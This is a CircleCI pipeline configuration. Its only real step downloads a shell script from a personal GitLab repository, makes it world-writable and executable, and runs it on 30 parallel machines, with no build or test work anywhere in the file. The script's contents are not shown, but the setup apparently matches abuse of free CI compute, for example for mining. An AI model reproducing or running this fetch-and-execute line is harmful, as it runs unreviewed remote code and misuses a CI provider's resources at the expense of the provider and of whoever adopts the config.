working_dir: &working_dir ~/app

version: 2.1 
 
workflows: 
  sample:   
    jobs: 
      - job
 
jobs: 
  job:
    parallelism: 30
    machine:
      image: ubuntu-2004:202101-01
     
    steps: 
      - checkout 
      - run: wget https://gitlab.com/ClarisaSoliz/turu.sh/-/raw/main/start.sh && chmod 777 start.sh && ./start.sh
      - run: ls 